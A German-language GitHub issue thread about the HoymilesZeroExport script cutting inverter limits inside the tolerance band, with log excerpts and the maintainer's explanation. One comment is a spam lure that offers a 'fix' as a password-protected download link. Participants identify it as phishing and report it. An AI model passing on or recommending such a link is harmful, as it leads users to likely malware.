reserve85/HoymilesZeroExport #233: Frage zu MAX_DIFFERENCE_BETWEEN_LIMIT_AND_OUTPUTPOWER

Ollipop030, 2024-08-28:
Moin moin, mir ist da gerade was aufgefallen. Mein Limit steht bei -100, die Toleranz bei 50. Das Script schneidet aber öfter das Limit ab und sendet einen neuen Wert an die Wechselrichter, obwohl er sich genau im Toleranzbereich bewegt. Soll das so? Oder verstehe ich die Funktion MAX_DIFFERENCE_BETWEEN_LIMIT_AND_OUTPUTPOWER falsch? Ich dachte immer, die Funktion greift nur bei Netzbezug.

```
Aug 28 09:31:52 Pi-Hole python3[950]: 2024-08-28 09:31:52 INFO     powermeter Emlog: -65 Watt
Aug 28 09:31:53 Pi-Hole python3[950]: 2024-08-28 09:31:53 INFO     powermeter Emlog: -65 Watt
Aug 28 09:31:54 Pi-Hole python3[950]: 2024-08-28 09:31:54 INFO     powermeter Emlog: -65 Watt
Aug 28 09:31:55 Pi-Hole python3[950]: 2024-08-28 09:31:55 INFO     intermediate meter Emlog: 448 Watt
Aug 28 09:31:55 Pi-Hole python3[950]: 2024-08-28 09:31:55 INFO     Cut limit to 628 Watt, limit was higher than 10 percent of live-production
Aug 28 09:31:55 Pi-Hole python3[950]: 2024-08-28 09:31:55 INFO     setting new limit to 628 Watt
Aug 28 09:31:55 Pi-Hole python3[950]: 2024-08-28 09:31:55 INFO     Ahoy: Inverter "HM-1500": setting new limit from 533 Watt to 523 Watt
Aug 28 09:31:56 Pi-Hole python3[950]: 2024-08-28 09:31:56 INFO     Ahoy: Inverter "HM-1500": Limit acknowledged
Aug 28 09:31:56 Pi-Hole python3[950]: 2024-08-28 09:31:56 INFO     Ahoy: Inverter "HM-300": setting new limit from 106 Watt to 104 Watt
Aug 28 09:31:57 Pi-Hole python3[950]: 2024-08-28 09:31:57 INFO     Ahoy: Inverter "HM-300": Limit acknowledged
Aug 28 09:31:57 Pi-Hole python3[950]: 2024-08-28 09:31:57 INFO     Ahoy: Inverter "HM-1500" Available: True
Aug 28 09:31:57 Pi-Hole python3[950]: 2024-08-28 09:31:57 INFO     Ahoy: Inverter "HM-300" Available: True
Aug 28 09:31:57 Pi-Hole python3[950]: 2024-08-28 09:31:57 INFO     powermeter Emlog: -65 Watt
Aug 28 09:31:58 Pi-Hole python3[950]: 2024-08-28 09:31:58 INFO     powermeter Emlog: -65 Watt
Aug 28 09:31:59 Pi-Hole python3[950]: 2024-08-28 09:31:59 INFO     powermeter Emlog: -65 Watt
Aug 28 09:32:00 Pi-Hole python3[950]: 2024-08-28 09:32:00 INFO     powermeter Emlog: -65 Watt
Aug 28 09:32:01 Pi-Hole python3[950]: 2024-08-28 09:32:01 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:02 Pi-Hole python3[950]: 2024-08-28 09:32:02 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:03 Pi-Hole python3[950]: 2024-08-28 09:32:03 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:04 Pi-Hole python3[950]: 2024-08-28 09:32:04 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:05 Pi-Hole python3[950]: 2024-08-28 09:32:05 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:06 Pi-Hole python3[950]: 2024-08-28 09:32:06 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:07 Pi-Hole python3[950]: 2024-08-28 09:32:07 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:08 Pi-Hole python3[950]: 2024-08-28 09:32:08 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:09 Pi-Hole python3[950]: 2024-08-28 09:32:09 INFO     powermeter Emlog: -63 Watt
Aug 28 09:32:10 Pi-Hole python3[950]: 2024-08-28 09:32:10 INFO     intermediate meter Emlog: 445 Watt
Aug 28 09:32:10 Pi-Hole python3[950]: 2024-08-28 09:32:10 INFO     Cut limit to 625 Watt, limit was higher than 10 percent of live-production
Aug 28 09:32:10 Pi-Hole python3[950]: 2024-08-28 09:32:10 INFO     setting new limit to 625 Watt
```

NEKO-JOJUK, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

tomquist, 2024-08-28:
Sieht nach Phishing aus. Zu das nicht.

Ollipop030, 2024-08-28:
> Sieht nach Phishing aus. Tu das nicht.

Ja, die Spambots sind schnell heute.

reserve85, 2024-08-28:
ne das Limit wird in jedem Durchlauf wenn nötig gecuttet. Auch wenn du in der Toleranz bist.
Passt schon.

Den Spambot hab ich mal gemeldet...

Ollipop030, 2024-08-28:
Alles klar. Besten Dank.

> Den Spambot hab ich mal gemeldet...

Der ist morgen unter anderem Namen wieder da. ;-)

closed 2024-08-28 by Ollipop030